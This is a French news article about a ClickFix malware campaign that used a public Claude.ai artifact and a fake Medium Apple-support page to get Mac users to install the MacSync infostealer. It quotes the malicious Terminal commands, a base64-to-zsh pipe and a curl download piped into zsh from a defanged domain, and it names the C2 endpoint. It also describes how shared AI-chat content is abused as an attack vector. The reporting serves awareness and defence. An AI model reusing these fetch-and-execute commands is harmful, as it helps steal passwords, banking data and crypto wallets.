Plus de 15 600 utilisateurs Mac ont consulté un guide malveillant hébergé sur Claude.ai. Des pirates ont détourné les artefacts publics d'Anthropic pour propager le voleur d'informations MacSync via de fausses commandes Terminal.
15 600 consultations en quelques jours. Un artefact Claude partagé publiquement installe en réalité MacSync, un spyware qui exfiltre mots de passe, données bancaires et portefeuilles crypto depuis macOS. Les chercheurs de Moonlock Lab et d'AdGuard ont repéré deux variantes de cette attaque ClickFix, promues via des publicités Google sur des requêtes techniques banales. L'une utilise un document Claude public, l'autre un faux article Medium imitant le support Apple. La victime reçoit l'instruction de coller une commande shell dans le Terminal. MacSync s'installe aussitôt.
Des résultats de recherche Google piégés pour cibler les développeurs Mac
Les annonces malveillantes ciblent les requêtes que tapent régulièrement les développeurs macOS : « résolveur DNS en ligne », « analyseur d'espace disque en ligne de commande macOS » ou encore « HomeBrew ». Les publicités renvoient vers un artefact Claude.ai ou vers un article Medium grimé en page d'aide officielle d'Apple. Dans les deux cas, le but est de leur faire exécuter une commande dans le Terminal.
La première variante propose echo "..." | base64 -D | zsh, la seconde passe par true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh. Ces lignes décodent ou téléchargent un chargeur qui installe MacSync. Le spyware communique ensuite avec son serveur de commande et de contrôle (C2) via un jeton et une clé API codés en dur. Il usurpe un agent utilisateur de navigateur macOS pour se fondre dans le trafic normal.
Moonlock Lab a constaté que les deux variantes récupèrent leur payload depuis la même adresse C2, a2abotnet[.]com/gate. Un seul acteur malveillant pilote donc les deux campagnes. MacSync ordonne à AppleScript de piller le trousseau d'accès, les données des navigateurs et les portefeuilles de cryptomonnaies. Les informations volées atterrissent dans une archive compressée baptisée « /tmp/osalogging.zip », puis partent vers le serveur C2 via une requête HTTP POST. Si le transfert échoue, le malware fragmente l'archive et retente l'opération huit fois avant d'effacer toute trace.
Une technique qui s'étend à tous les grands LLM
AdGuard avait déjà repéré le guide malveillant quelques jours avant Moonlock, alors qu'il totalisait 12 300 consultations. Les pirates ont réussi à placer leurs annonces dans des positions très visibles sur Google, et les clics se sont multipliés. Les artefacts Claude affichent pourtant un avertissement : le contenu provient d'un utilisateur et n'a pas été vérifié. Cela n'a pas suffi.
En décembre 2025, des chercheurs avaient découvert une attaque similaire exploitant les conversations partagées de ChatGPT et Grok pour propager le spyware AMOS. L'apparition de la variante Claude ne fait que confirmer que les cybercriminels étendent leur technique à l'ensemble des grands modèles de langage dotés d'une fonctionnalité de partage public. Tous les LLM qui permettent de rendre des conversations ou des contenus générés accessibles via un lien hébergé sur leur domaine officiel offrent aux pirates un vecteur d'attaque, car l'URL officielle rassure les utilisateurs.
En cas de doute, n'hésitez pas à interroger le chatbot lui-même, dans la même conversation, sur la sécurité des commandes proposées. Un LLM identifie généralement les instructions dangereuses et alerte l'utilisateur. La meilleure défense reste de ne jamais exécuter dans le Terminal une commande qu'on ne maîtrise pas totalement, quelle que soit la source qui la suggère.
Source : Bleeping Computer
